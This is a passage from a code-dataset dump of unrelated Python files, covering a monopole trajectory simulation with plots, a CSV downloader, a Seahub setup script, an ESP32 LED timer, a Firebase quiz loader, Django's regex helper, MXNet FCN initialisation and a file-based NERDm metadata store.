NONRELATIVISTIC\\n\")\nf.write(str(0.5*m*mag(vel)**2)+\"\\n\")\nf.write(\"maxvelocity\\n\")\nf.write(str(maxvelocity)+\"\\n\")\nf.write(\"maxvelocity/c\\n\")\nf.write(str(maxvelocity/c)+\"\\n\")\nf.write(\"arclength_in_rho1kpc_region\\n\")\nf.write(str(arclength_in_rho1kpc_region)+\"\\n\")\nf.write(\"time\\n\")\nf.write(str(-iterations*dt)+\"\\n\")\nf.write(\"iterations\\n\")\nf.write(str(iterations)+\"\\n\")\nf.write(\"real runtime\\n\")\nf.write(str(gettimesecs()-tstartsecs)+\"\\n\")\nf.write(\"final acc\\n\")\nf.write(np.array_str(acc)+\"\\n\\n\\n\")\nf.write(\"exit status\\n\")\nf.write(str(exitstatus))\nf.close()\ng.write(\"theta, phi, velx, vely, velz for run: \"+str(V)+\" \"+str(THETA)+\" \"+str(PHI)+\":\\n \\n\")\ng.write(str(theta_f)+\"\\n\")\ng.write(str(phi_f)+\"\\n\")\ng.write(str(vel[0])+\"\\n\")\ng.write(str(vel[1])+\"\\n\")\ng.write(str(vel[2])+\"\\n \\n\")\n\ng.close()\n\nprint(\"done with run (V,THETA,PHI): \"+str(V)+\" \"+str(THETA)+\" \"+str(PHI))\nprint(\"final speed over c:\",mag(vel)/c)\nprint(\"iterations:\",iterations)\n\nprint(\"done with all runs\")\nprint(\"finished at\",str(gettimestd()))\nprint(\"Total time running:\",gettimesecs()-tzero,\"seconds.\")\n\n\n#=========PLOTTING THE REGIONS========\nprint(\"plotting fig1: disk 
regions...\\n\")\nplt.figure(1)\npolar_ax=plt.subplot(111,polar=True)\npolar_ax.set_rlim((0*kpctocm,20*kpctocm))\n\n#list of regiondata, each region has an rlist and a thetalist\nplotdata=[ [[],[]] for n in range(8)]\n\nfor rr in np.linspace(5*kpctocm, 20*kpctocm, num=50):\n for ttheta in np.linspace(0, 2*np.pi, num=500):\n howmanyregions=regiondebug(rr,ttheta)[0]\n \n if howmanyregions==1:\n regionnumber=(regiondebug(rr,ttheta)[1][1])%8+1 #the region i'm in is the biggest index of the surrounding curves + 1. \n \n plotdata[regionnumber-1][0]+=[ttheta]\n plotdata[regionnumber-1][1]+=[rr]\n\ncolorlist=[\"bo\",\"go\",\"ro\",\"co\",\"mo\",\"yo\",\"ko\",\"wo\"]\n\nfor k in range(8):\n polar_ax.plot(plotdata[k][0],plotdata[k][1],colorlist[k],markersize=3)\n\nplt.title(\"Map of disk field regions\")\n\nplt.text(np.pi,32*kpctocm,\"\\nblue: r1\\ngreen: r2\\nred: r3\\ncyan: r4\\nmagenta: r5\\nyellow: r6\\nblack: r7\\ngray: r8 \")\n\n#=====PLOTTING THE TRAJECTORY=====\nprint(\"plotting fig2: trajectory...\\n\")\ntrajectory_fig=plt.figure(2)\ntrajectory_ax=trajectory_fig.gca(projection=\"3d\")\ntrajectory_ax.plot(xlist,ylist,zlist,\"r\")\n\ntrajectory_ax.set_title(\"Trajectory of Monopole\")\n\ntrajectory_ax.text2D(0.00, 0.00, \"x0=\"+str(pos_0)+\"\\nv0=\"+str(vel_0), transform=trajectory_ax.transAxes)\n\ntrajectory_ax.set_xlabel('X') #label each positional axis\ntrajectory_ax.set_ylabel('Y')\ntrajectory_ax.set_zlabel('Z')\n\ntrajectory_ax.set_xlim3d(-20*kpctocm, 20*kpctocm) #set view ranges for the x, y, and z axes \ntrajectory_ax.set_ylim3d(-20*kpctocm, 20*kpctocm)\ntrajectory_ax.set_zlim3d(-20*kpctocm, 20*kpctocm) \n\n#=====PLOTTING THE BFIELD=====\nprint(\"plotting fig3: bfield...\\n\")\nvector_fig=plt.figure(3)\nvector_ax=vector_fig.gca(projection=\"3d\")\nvector_ax.set_title(\"Bfield Vector Plot\")\nxmin,xmax=-20*kpctocm,20*kpctocm\nymin,ymax=-20*kpctocm,20*kpctocm\nzmin,zmax=-20*kpctocm,20*kpctocm\n\narrowlength=2\n\nplotstep=4*kpctocm #what is the spacing between adjacent vectors? (defines the density of vector plot)\nx,y,z = np.meshgrid(np.arange(xmin, xmax+1, plotstep),\n np.arange(ymin, ymax+1, plotstep),\n np.arange(zmin, zmax+1, plotstep))\n#for some reason, the above command creates x, y, z\n#matricies with lists of coordinates (y,x,z). 
I don't\n#know why it would order the coordinates like that.\n#but it's the way that it works in the quiver example \n#too, and it seems to graph correctly based on their ranges.\n\nhowmany_x, howmany_y, howmany_z = (xmax-xmin)//plotstep+1, (ymax-ymin)//plotstep+1, (zmax-zmin)//plotstep+1\n\n\nu=np.zeros(shape=(howmany_y,howmany_x,howmany_z)) #shape is (number of x values being plotted, num y values, num z values)\nv=np.zeros(shape=(howmany_y,howmany_x,howmany_z))\nw=np.zeros(shape=(howmany_y,howmany_x,howmany_z))\n\n\ndef f(VEC):\n return np.array([VEC[0],0,0])\n \n \nfor I in range(howmany_y):\n for J in range(howmany_x): \n for K in range(howmany_z):\n position=np.array([x[I][J][K], y[I][J][K], z[I][J][K]])\n# print(position)\n# print(\"\")\n# print(\"i,j,k are\", I,J,K)\n# print(\"position is:\", position)\n# print(\"r is:\", mag([position[0],position[1],0]))\n u[I][J][K]=get_B(position)[0]\n v[I][J][K]=get_B(position)[1]\n w[I][J][K]=get_B(position)[2]\n \nvector_ax.quiver(x, y, z, u, v, w, length=arrowlength)\n\n#PLOTTING CIRCLES OF R=1, 5, 20\nx_rad1_list, y_rad1_list, x_rad5_list, y_rad5_list, x_rad20_list, y_rad20_list, =[ [] for _ in range(6) ]\n\nfor angle in np.linspace(0.0,2*np.pi,num=int(2*np.pi//0.1)):\n x_rad1_list+=[1*kpctocm*np.cos(angle)]\n y_rad1_list+=[1*kpctocm*np.sin(angle)]\n x_rad5_list+=[5*kpctocm*np.cos(angle)]\n y_rad5_list+=[5*kpctocm*np.sin(angle)]\n x_rad20_list+=[20*kpctocm*np.cos(angle)]\n y_rad20_list+=[20*kpctocm*np.sin(angle)]\n\nz_circle=[]\nfor n in range(len(x_rad1_list)):\n z_circle+=[0]\n \nvector_ax.plot(x_rad1_list, y_rad1_list,z_circle,\"k\")\nvector_ax.plot(x_rad5_list, y_rad5_list,z_circle,\"k\")\nvector_ax.plot(x_rad20_list, y_rad20_list,z_circle,\"k\")\n\nvector_ax.set_xlabel('X') #label each positional axis\nvector_ax.set_ylabel('Y')\nvector_ax.set_zlabel('Z')\n\nvector_ax.set_xlim3d(xmin-arrowlength, xmax+arrowlength) #set view ranges for the x, y, and z axes \nvector_ax.set_ylim3d(ymin-arrowlength, ymax+arrowlength)\nvector_ax.set_zlim3d(zmin-arrowlength, zmax+arrowlength) \n\n#=====BUGTESTING PLOT: XY CROSS SECTION WITH MAGNITUDES =====\nprint(\"plotting fig4: xy cross section...\\n\")\nxy_fig=plt.figure(4)\nxy_ax=plt.subplot(111)\n\nzcrossvalue=1\n\nplt.title(\"XY Cross Section, Z=\"+str(zcrossvalue))\n\nxylistx, xylisty,xylistBmag = [],[],[]\n\nfor xx in np.linspace(-21*kpctocm,21*kpctocm,num=201):\n for yy in np.linspace(-21*kpctocm,21*kpctocm,num=201):\n xylistBmag+=[mag(get_B([xx,yy,zcrossvalue]))]\n xylistx+=[xx]\n xylisty+=[yy]\n \nxybiggestB=max(xylistBmag)\nxysmallestB=min([_ for _ in xylistBmag if _!=0])\nfor n in range(len(xylistBmag)):\n \n if xylistBmag[n] != 0:\n #here, I scale the B magnitudes so that the lowest one has size ~10^-2 and the greatest one is 1. 
\n #Then I flip them about 0.5, according to matplotlib's convention, so that the strongest is black.\n #I also make them a string to be interpretable in matplotlib's color thing.\n xylistBmag[n]=str(1-np.power(xylistBmag[n]/xybiggestB, 2.0/17.0))\n else:\n #zero spots are colored green to distinguish from near-white nonzero spots.\n xylistBmag[n]=\"g\"\n\n\n\nxy_ax.scatter(xylistx,xylisty,color=xylistBmag,marker='o')\n\nxy_ax.set_xbound(-20*kpctocm,20*kpctocm)\nxy_ax.set_ybound(-20*kpctocm,20*kpctocm)\n\nxy_ax.set_xlabel(\"X\")\nxy_ax.set_ylabel(\"Y\")\n\nplt.text(-26*kpctocm,-24*kpctocm,\"White ~1e-27, Blk ~1e-12, Grn=0 $\\mu G$\")\n\n\n#=====BUGTESTING PLOT: XZ CROSS SECTION WITH MAGNITUDES =====\nprint(\"plotting fig5: xz cross section...\\n\")\nxz_fig=plt.figure(5)\nxz_ax=plt.subplot(111)\n\nycrossvalue=0\n\nplt.title(\"XZ Cross Section, Y=\"+str(ycrossvalue))\n\nxzlistx, xzlistz,listBmag = [],[],[]\n\nfor xx in np.linspace(-21*kpctocm,21*kpctocm,num=201):\n for zz in np.linspace(-21*kpctocm,21*kpctocm,num=201):\n listBmag+=[mag(get_B([xx,ycrossvalue,zz]))]\n xzlistx+=[xx]\n xzlistz+=[zz]\n \nbiggestB=max(listBmag)\nsmallestB=min([_ for _ in listBmag if _!=0])\nfor n in range(len(listBmag)):\n \n if listBmag[n] != 0:\n #here, I scale the B magnitudes so that the lowest one has exponent 10^-2 and the greatest one is 1. \n #Then I flip them about 0.5, according to matplotlib's convention, so that the strongest is black.\n #I also make them a string to be interpretable in matplotlib's color thing.\n listBmag[n]=str(1-np.power(listBmag[n]/biggestB, 2.0/17.0))\n else:\n #zero spots are colored green to distinguish from near-white nonzero spots.\n listBmag[n]=\"g\"\n\n\nxz_ax.scatter(xzlistx,xzlistz,color=listBmag,marker='o')\n\nxz_ax.set_xbound(-20*kpctocm,20*kpctocm)\nxz_ax.set_ybound(-20*kpctocm,20*kpctocm)\n\nxz_ax.set_xlabel(\"X\")\nxz_ax.set_ylabel(\"Z\")\n\nplt.text(-26*kpctocm,-24*kpctocm,\"White ~5e-27, Blk ~1e-10, Grn=0 $\\mu G$\")\n\n#=====DONE WITH PLOTS=====\nplt.show()\n\n","repo_name":"doublefelix921/monopoles","sub_path":"scripts,backups/monopoles15_graphed_cgs.py","file_name":"monopoles15_graphed_cgs.py","file_ext":"py","file_size_in_byte":24281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34909930431","text":"# author: Tiffany Timbers\n# date: 2019-12-18\n\n\"\"\"Downloads data csv data from the web to a local filepath as a csv.\n\nUsage: download_data.py --url= --out_file= \n \nOptions:\n--url= URL from where to download the data (must be in standard csv format)\n--out_file= Path (including filename) of where to locally write the file\n\"\"\"\n\nimport os\nimport pandas as pd\nimport requests\nfrom docopt import docopt\n\nopt = docopt(__doc__)\n\ndef main(url, out_file):\n try: \n request = requests.get(url)\n request.status_code == 200\n except Exception as req:\n print(req)\n print(\"Website at the provided url does not exist\")\n data = pd.read_csv(url)\n try:\n data.to_csv(out_file, index=False)\n except:\n os.makedirs(os.path.dirname(out_file))\n data.to_csv(out_file, index=False)\n\n\nif __name__ == \"__main__\":\n main(opt[\"--url\"], opt[\"--out_file\"])\n","repo_name":"ashwin2507/test","sub_path":"download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14567577619","text":"import os\nimport subprocess\nimport shutil\nimport contextlib\nfrom oslocfg import 
cfg\nfrom seafutil.command import SeafCommand\nfrom seafutil.seafile import SeafileCommand\n\n\nCONF = cfg.CONF\nNAME = 'seahub'\nFILENAME = 'seahub_settings.py'\n\n\nTEMPLATE = '''\\\n# -*- coding: utf-8 -*-\\n\nSECRET_KEY = '%(key)s'\\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.%(engine)s',\n 'NAME': '%(name)s',\n 'USER': '%(username)s',\n 'PASSWORD': '%(password)s',\n 'HOST': '%(host)s',\n 'PORT': '%(port)s'\n }\n}\\n\nENABLE_RESUMABLE_FILEUPLOAD = False\\n\nSEND_EMAIL_ON_ADDING_SYSTEM_MEMBER = False\\n\n'''\n\nMEMCACHED = '''\\\n\\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django_pylibmc.memcached.PyLibMCCache',\n 'LOCATION': '/run/seafile/memcached.sock',\n },\n 'locmem': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n },\n}\\n\nCOMPRESS_CACHE_BACKEND = 'locmem'\\n\nTHUMBNAIL_IMAGE_SIZE_LIMIT = 100\\n\nENABLE_VIDEO_THUMBNAIL = False\\n\nFILE_PREVIEW_MAX_SIZE = 30 * 1024 * 1024\\n\n'''\n\ndef make_symlink(source, target):\n # get symlink\n pwd = os.getcwd()\n\n os.chdir(os.path.dirname(target))\n symlink = os.path.realpath(source)\n os.chdir(pwd)\n os.symlink(symlink, target)\n # return symlink\n\n\n\nclass SeahubCommand(SeafCommand):\n\n @contextlib.contextmanager\n def generate_conf(self):\n\n with self.prepare_datadir():\n conf = CONF\n cfile = os.path.join(CONF.cfgdir, FILENAME)\n text = TEMPLATE % dict(key=CONF.hubkey,\n name=conf.dbname,\n engine=conf.engine,\n username=conf.dbuser,\n password=conf.dbpass,\n host=conf.dbhost,\n port=conf.dbport)\n if CONF.memcache:\n text += MEMCACHED\n\n with open(cfile, 'w') as f:\n f.write(text)\n\n self.chown(cfile)\n try:\n yield\n except Exception as e:\n os.remove(cfile)\n raise e\n\n\n @contextlib.contextmanager\n def prepare_avatar_dir(self):\n media_dir = os.path.join(CONF.seahub, 'media')\n orig_avatar_dir = os.path.join(media_dir, 'avatars')\n orig_avatar_dir_default = os.path.join(media_dir, 'avatars.default')\n\n dest_avatar_dir = os.path.join(CONF.datadir, 'avatars')\n\n # backup avatars\n shutil.move(orig_avatar_dir, orig_avatar_dir_default)\n # copy to dst\n shutil.copytree(orig_avatar_dir_default, dest_avatar_dir)\n # change owner\n self.chown(dest_avatar_dir)\n self.chown(os.path.join(dest_avatar_dir, 'groups'))\n # make symlink\n make_symlink(dest_avatar_dir, orig_avatar_dir)\n\n\n try:\n yield\n except Exception as e:\n # rollback\n os.unlink(orig_avatar_dir)\n shutil.rmtree(dest_avatar_dir)\n shutil.move(orig_avatar_dir_default, orig_avatar_dir)\n raise e\n\n def execute(self):\n with self.prepare_avatar_dir():\n with self.database.prepare():\n sqlfile = os.path.join(CONF.seahub, 'sql', 'mysql.sql')\n info = dict(user=CONF.dbuser, passwd=CONF.dbpass,\n host=CONF.dbhost, port=CONF.dbport,\n schema=CONF.dbname, sqlfile=sqlfile)\n command = 'mysql -u%(user)s -p%(passwd)s -h%(host)s -P %(port)d %(schema)s < %(sqlfile)s' % info\n sub = subprocess.Popen(command, shell=True)\n code = sub.wait()\n if code != 0:\n raise ValueError('Run init sql fail')\n thumbdir = os.path.join(CONF.seahub, 'seahub', 'thumbnail', 'thumb')\n if not os.path.exists(thumbdir):\n os.makedirs(thumbdir)\n self.chown(thumbdir)\n","repo_name":"lolizeppelin/seafutil","sub_path":"seafutil/seahub.py","file_name":"seahub.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71601697069","text":"import machine\nimport time\n\n# (blue) on-board LED:\nled = machine.Pin(2, machine.Pin.OUT)\n\nN = 100000\n\n# Switch the LED on and off 
directly via method calls.\ndef blink_simple(n):\n for i in range(n):\n led.on()\n led.off()\n\ndef timer(f, n):\n t0 = time.ticks_us()\n f(n)\n t1 = time.ticks_us()\n dt = time.ticks_diff(t1, t0)\n fmt = \"{:5.3f} s, {:6.3f} uSec/blink : {:8.2f} kHz/s\"\n print(fmt.format(dt * 1e-6, dt/N, N/dt * 1e3))\n\n\ntimer(blink_simple, N)\n","repo_name":"bvhest/IoT-01_Playground","sub_path":"esp32_wroom/fastLED/fastLED_4.py","file_name":"fastLED_4.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"343495057","text":"\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport random\nimport json\n\nJSON_PATH='./pet-quiz-cf348-firebase-adminsdk-4oflx-cde31cd4ab.json'\ndef init_database():\n cred = credentials.Certificate(JSON_PATH)\n firebase_admin.initialize_app(cred)\n db = firestore.client()\n\n return db\n\n\nADD_DATA_PATH = './add.json'\ndef add_data(db,add):\n \n try:\n doc_ref = db.collection('questions')\n doc_ref.add(add)\n print(1)\n return\n except:\n print(2)\n return\n\ndef add_some_data(db,add_list_data): \n doc_ref = db.collection('questions')\n for add_j in add_list_data:\n try:\n doc_ref.add(add_j)\n print(\"added\")\n except:\n print(\"denied\")\n return\n\n \n\ndef main():\n db = init_database()\n\n# Return questions for a specified question count\ndef get_questions_by_num(db,number):\n docs = get_all_questions(db)\n if not (docs==None):\n # check that the requested count is valid\n if(number<=len(docs)):\n published = []\n questions = []\n i=0\n while(i
If the escaped character is one that is\n skipped, it is not returned (the next character is returned instead).\n\n Yield the next character, along with a boolean indicating whether it is a\n raw (unescaped) character or not.\n \"\"\"\n for ch in input_iter:\n if ch != \"\\\\\":\n yield ch, False\n continue\n ch = next(input_iter)\n representative = ESCAPE_MAPPINGS.get(ch, ch)\n if representative is None:\n continue\n yield representative, True\n\n\ndef walk_to_end(ch, input_iter):\n \"\"\"\n The iterator is currently inside a capturing group. Walk to the close of\n this group, skipping over any nested groups and handling escaped\n parentheses correctly.\n \"\"\"\n if ch == \"(\":\n nesting = 1\n else:\n nesting = 0\n for ch, escaped in input_iter:\n if escaped:\n continue\n elif ch == \"(\":\n nesting += 1\n elif ch == \")\":\n if not nesting:\n return\n nesting -= 1\n\n\ndef get_quantifier(ch, input_iter):\n \"\"\"\n Parse a quantifier from the input, where \"ch\" is the first character in the\n quantifier.\n\n Return the minimum number of occurrences permitted by the quantifier and\n either None or the next character from the input_iter if the next character\n is not part of the quantifier.\n \"\"\"\n if ch in \"*?+\":\n try:\n ch2, escaped = next(input_iter)\n except StopIteration:\n ch2 = None\n if ch2 == \"?\":\n ch2 = None\n if ch == \"+\":\n return 1, ch2\n return 0, ch2\n\n quant = []\n while ch != \"}\":\n ch, escaped = next(input_iter)\n quant.append(ch)\n quant = quant[:-1]\n values = \"\".join(quant).split(\",\")\n\n # Consume the trailing '?', if necessary.\n try:\n ch, escaped = next(input_iter)\n except StopIteration:\n ch = None\n if ch == \"?\":\n ch = None\n return int(values[0]), ch\n\n\ndef contains(source, inst):\n \"\"\"\n Return True if the \"source\" contains an instance of \"inst\". False,\n otherwise.\n \"\"\"\n if isinstance(source, inst):\n return True\n if isinstance(source, NonCapture):\n for elt in source:\n if contains(elt, inst):\n return True\n return False\n\n\ndef flatten_result(source):\n \"\"\"\n Turn the given source sequence into a list of reg-exp possibilities and\n their arguments. 
Return a list of strings and a list of argument lists.\n Each of the two lists will be of the same length.\n \"\"\"\n if source is None:\n return [\"\"], [[]]\n if isinstance(source, Group):\n if source[1] is None:\n params = []\n else:\n params = [source[1]]\n return [source[0]], [params]\n result = [\"\"]\n result_args = [[]]\n pos = last = 0\n for pos, elt in enumerate(source):\n if isinstance(elt, str):\n continue\n piece = \"\".join(source[last:pos])\n if isinstance(elt, Group):\n piece += elt[0]\n param = elt[1]\n else:\n param = None\n last = pos + 1\n for i in range(len(result)):\n result[i] += piece\n if param:\n result_args[i].append(param)\n if isinstance(elt, (Choice, NonCapture)):\n if isinstance(elt, NonCapture):\n elt = [elt]\n inner_result, inner_args = [], []\n for item in elt:\n res, args = flatten_result(item)\n inner_result.extend(res)\n inner_args.extend(args)\n new_result = []\n new_args = []\n for item, args in zip(result, result_args):\n for i_item, i_args in zip(inner_result, inner_args):\n new_result.append(item + i_item)\n new_args.append(args[:] + i_args)\n result = new_result\n result_args = new_args\n if pos >= last:\n piece = \"\".join(source[last:])\n for i in range(len(result)):\n result[i] += piece\n return result, result_args\n\n\ndef _lazy_re_compile(regex, flags=0):\n \"\"\"Lazily compile a regex with flags.\"\"\"\n\n def _compile():\n # Compile the regex if it was not passed pre-compiled.\n if isinstance(regex, (str, bytes)):\n return re.compile(regex, flags)\n else:\n assert not flags, \"flags must be empty if regex is passed pre-compiled\"\n return regex\n\n return SimpleLazyObject(_compile)\n","repo_name":"django/django","sub_path":"django/utils/regex_helper.py","file_name":"regex_helper.py","file_ext":"py","file_size_in_byte":12771,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"720237715","text":"import mxnet as mx\nimport numpy as np\nimport sys\nimport logging\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n# make a bilinear interpolation kernel, return a numpy.ndarray\ndef upsample_filt(size):\n factor = (size + 1) // 2\n if size % 2 == 1:\n center = factor - 1.0\n else:\n center = factor - 0.5\n og = np.ogrid[:size, :size]\n return (1 - abs(og[0] - center) / factor) * \\\n (1 - abs(og[1] - center) / factor)\n\ndef init_from_vgg16(ctx, fcnxs_symbol, vgg16fc_args, vgg16fc_auxs):\n fcnxs_args = vgg16fc_args.copy()\n fcnxs_auxs = vgg16fc_auxs.copy()\n for k,v in fcnxs_args.items():\n if(v.context != ctx):\n fcnxs_args[k] = mx.nd.zeros(v.shape, ctx)\n v.copyto(fcnxs_args[k])\n for k,v in fcnxs_auxs.items():\n if(v.context != ctx):\n fcnxs_auxs[k] = mx.nd.zeros(v.shape, ctx)\n v.copyto(fcnxs_auxs[k])\n data_shape=(1,3,500,500)\n arg_names = fcnxs_symbol.list_arguments()\n arg_shapes, _, _ = fcnxs_symbol.infer_shape(data=data_shape)\n rest_params = dict([(x[0], mx.nd.zeros(x[1], ctx)) for x in zip(arg_names, arg_shapes)\n if x[0] in ['score_weight', 'score_bias', 'score_pool4_weight', 'score_pool4_bias', \\\n 'score_pool3_weight', 'score_pool3_bias']])\n fcnxs_args.update(rest_params)\n deconv_params = dict([(x[0], x[1]) for x in zip(arg_names, arg_shapes)\n if x[0] in [\"bigscore_weight\", 'score2_weight', 'score4_weight']])\n for k, v in deconv_params.items():\n filt = upsample_filt(v[3])\n initw = np.zeros(v)\n initw[range(v[0]), range(v[1]), :, :] = filt # becareful here is the slice assing\n fcnxs_args[k] = mx.nd.array(initw, ctx)\n return fcnxs_args, 
fcnxs_auxs\n\ndef init_from_fcnxs(ctx, fcnxs_symbol, fcnxs_args_from, fcnxs_auxs_from):\n \"\"\" use zero initialization for better convergence, because it tends to output 0,\n and the label 0 stands for background, which may occupy most size of one image.\n \"\"\"\n fcnxs_args = fcnxs_args_from.copy()\n fcnxs_auxs = fcnxs_auxs_from.copy()\n for k,v in fcnxs_args.items():\n if(v.context != ctx):\n fcnxs_args[k] = mx.nd.zeros(v.shape, ctx)\n v.copyto(fcnxs_args[k])\n for k,v in fcnxs_auxs.items():\n if(v.context != ctx):\n fcnxs_auxs[k] = mx.nd.zeros(v.shape, ctx)\n v.copyto(fcnxs_auxs[k])\n data_shape=(1,3,500,500)\n arg_names = fcnxs_symbol.list_arguments()\n arg_shapes, _, _ = fcnxs_symbol.infer_shape(data=data_shape)\n rest_params = {}\n deconv_params = {}\n # this is fcn8s init from fcn16s\n if 'score_pool3_weight' in arg_names:\n rest_params = dict([(x[0], mx.nd.zeros(x[1], ctx)) for x in zip(arg_names, arg_shapes)\n if x[0] in ['score_pool3_bias', 'score_pool3_weight']])\n deconv_params = dict([(x[0], x[1]) for x in zip(arg_names, arg_shapes) if x[0] \\\n in [\"bigscore_weight\", 'score4_weight']])\n # this is fcn16s init from fcn32s\n elif 'score_pool4_weight' in arg_names:\n rest_params = dict([(x[0], mx.nd.zeros(x[1], ctx)) for x in zip(arg_names, arg_shapes)\n if x[0] in ['score_pool4_weight', 'score_pool4_bias']])\n deconv_params = dict([(x[0], x[1]) for x in zip(arg_names, arg_shapes) if x[0] \\\n in [\"bigscore_weight\", 'score2_weight']])\n # this is fcn32s init\n else:\n logging.error(\"you are initializing the fcn32s model, so you should use init_from_vgg16()\")\n sys.exit()\n fcnxs_args.update(rest_params)\n for k, v in deconv_params.items():\n filt = upsample_filt(v[3])\n initw = np.zeros(v)\n initw[range(v[0]), range(v[1]), :, :] = filt # be careful: this is slice assignment\n fcnxs_args[k] = mx.nd.array(initw, ctx)\n return fcnxs_args, fcnxs_auxs\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/fcn-xs/init_fcnxs.py","file_name":"init_fcnxs.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"72988757227","text":"\"\"\"\nan implementation of the NERDResource storage interface that stores the data in JSON files on disk\n\nThis is provided for development purposes that require only simple logical storage operations. 
See \n:py:mod:`nerdstore.base= self._nxtseq:\n self._idseq = n + 1\n self._cache_next_seq()\n\n @property\n def ids(self) -> [str]:\n return list(self._order)\n\n @property\n def count(self) -> int:\n return len(self._order)\n\n def _get_item_by_id(self, id: str) -> Mapping:\n objf = self._obj_file(id)\n if not objf.exists():\n raise ObjectNotFound(id)\n\n try:\n return read_json(str(objf))\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read file as JSON: %s\" \n % (str(self._seqp), str(ex)))\n\n def _get_item_by_pos(self, pos: int) -> Mapping:\n try: \n return self._get_item_by_id(self._order[pos])\n except IndexError:\n raise ObjectNotFound(\"position=\"+str(pos))\n\n def set_order(self, ids: Iterable[str]): \n neworder = []\n for id in ids:\n if id not in neworder and id in self._order:\n neworder.append(id)\n for id in self._order:\n if id not in neworder:\n neworder.append(id)\n self._order = neworder\n self._cache_ids()\n\n def move(self, idorpos: IDorPos, pos: int = None, rel: int = 0) -> int:\n if pos is None:\n pos = self.count\n rel = 0\n if not isinstance(pos, int):\n raise TypeError(\"move(): pos is not an int\")\n\n if isinstance(idorpos, int):\n if idorpos < -1*(len(self._order)-1) or idorpos >= len(self._order):\n raise IndexError(idorpos)\n oldpos = idorpos\n else:\n # ensure existence of data\n jf = self._obj_file(idorpos)\n if not jf.exists():\n raise ObjectNotFound(idorpos)\n try: \n oldpos = self._order.index(idorpos)\n except ValueError:\n # shouldn't happen; self-correcting programmer error (danger!)\n self._order.append(idorpos)\n oldpos = len(self._order) - 1\n\n if not isinstance(rel, (int, float)):\n rel = 1 if bool(rel) else 0\n if rel != 0:\n rel = math.floor(round(math.fabs(rel)/rel)) # +1 or -1\n pos = oldpos + rel * pos\n if pos == oldpos:\n return pos\n\n id = self._order.pop(oldpos)\n if pos > len(self._order):\n self._order.append(id)\n return len(self._order) -1\n\n elif pos < 0:\n pos = 0\n \n self._order.insert(pos, id)\n self._cache_ids()\n return pos\n\n def _set_item(self, id: str, md: Mapping, pos: int=None):\n if pos is not None and abs(pos) > self.count:\n raise IndexError(\"NERDm List index out of range: \"+str(pos))\n md = OrderedDict(md)\n md['@id'] = id\n \n neworder = list(self._order)\n if pos is not None:\n try:\n oldpos = neworder.index(id)\n except ValueError as ex:\n pass\n else:\n if pos > 0 and oldpos < pos:\n pos -= 1\n elif pos == -1 * len(neworder):\n pos = 0\n neworder.remove(id)\n neworder.insert(pos, id)\n elif id not in neworder:\n neworder.append(id)\n\n try:\n write_json(md, self._obj_file(id))\n except (TypeError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to write object file: %s\"\n % (str(self._seqp), str(ex)))\n self._order = neworder\n self._cache_ids()\n\n def _remove_item(self, id: str):\n out = self._get_item_by_id(id) # may raise ObjectNotFound\n\n if id in self._order:\n self._order.remove(id)\n self._cache_ids()\n\n return out\n\nclass FSBasedAuthorList(FSBasedObjectList, NERDAuthorList):\n \"\"\"\n an file-based implementation of the NERDAuthorList interface\n \"\"\"\n _pfx = \"auth\"\n def __init__(self, resource: NERDResource, authdir: str):\n FSBasedObjectList.__init__(self, resource, authdir)\n\n def load_authors(self, authors: Iterable[Mapping]) -> int:\n for auth in authors:\n # any validity checking?\n self.append(auth)\n\nclass FSBasedRefList(FSBasedObjectList, NERDRefList):\n \"\"\"\n an file-based implementation of the NERDRefList interface\n 
\"\"\"\n _pfx = \"ref\"\n def __init__(self, resource: NERDResource, refdir: str):\n FSBasedObjectList.__init__(self, resource, refdir)\n\n def load_references(self, refs: Iterable[Mapping]) -> int:\n for ref in refs:\n # any validity checking?\n self.append(ref)\n\nclass FSBasedNonFileComps(FSBasedObjectList, NERDNonFileComps):\n \"\"\"\n an file-based implementation of the NERDNonFileComps interface\n \"\"\"\n _pfx = \"cmp\"\n def __init__(self, resource: NERDResource, nfcmpdir: str):\n FSBasedObjectList.__init__(self, resource, nfcmpdir)\n\n def load_nonfile_components(self, cmps: Iterable[Mapping]) -> int:\n for cmp in cmps:\n if 'filepath' not in cmp:\n # any more validity checking?\n self.append(cmp)\n\n\nclass FSBasedFileComps(NERDFileComps):\n \"\"\"\n an file-based implementation of the NERDFileComps interface\n \"\"\"\n _pfx = \"file\"\n _chldfile = \"_children.json\"\n _seqfile = \"_seq.json\"\n \n def __init__(self, resource: NERDResource, filedir: str, iscollf=None):\n super(FSBasedFileComps, self).__init__(resource, iscollf)\n self._dir = Path(filedir)\n if not self._dir.is_dir():\n raise StorageFormatException(\"%s: does not exist as a directory\" % str(filedir))\n self._chldp = self._dir / self._chldfile # map: top-level file names to their IDs\n self._seqp = self._dir / self._seqfile # the path where the next sequence is cached\n self._nxtseq = self._read_next_seq() # the next available sequence # for assigned IDs\n self._children = self._read_toplevel_files() # the files at the top of the hierarchy\n\n def _read_next_seq(self):\n nxt = 0\n if self._seqp.is_file():\n try:\n nxt = read_json(self._seqp)\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read file as JSON: %s\" \n % (str(self._seqp), str(ex)))\n if not isinstance(nxt, int):\n raise StorageFormatException(\"%s: ID sequence file does not contain an integer\")\n\n return nxt\n\n # identifiers and sequence numbers\n #\n def _cache_next_seq(self, nxt: int = None):\n if nxt is None:\n nxt = 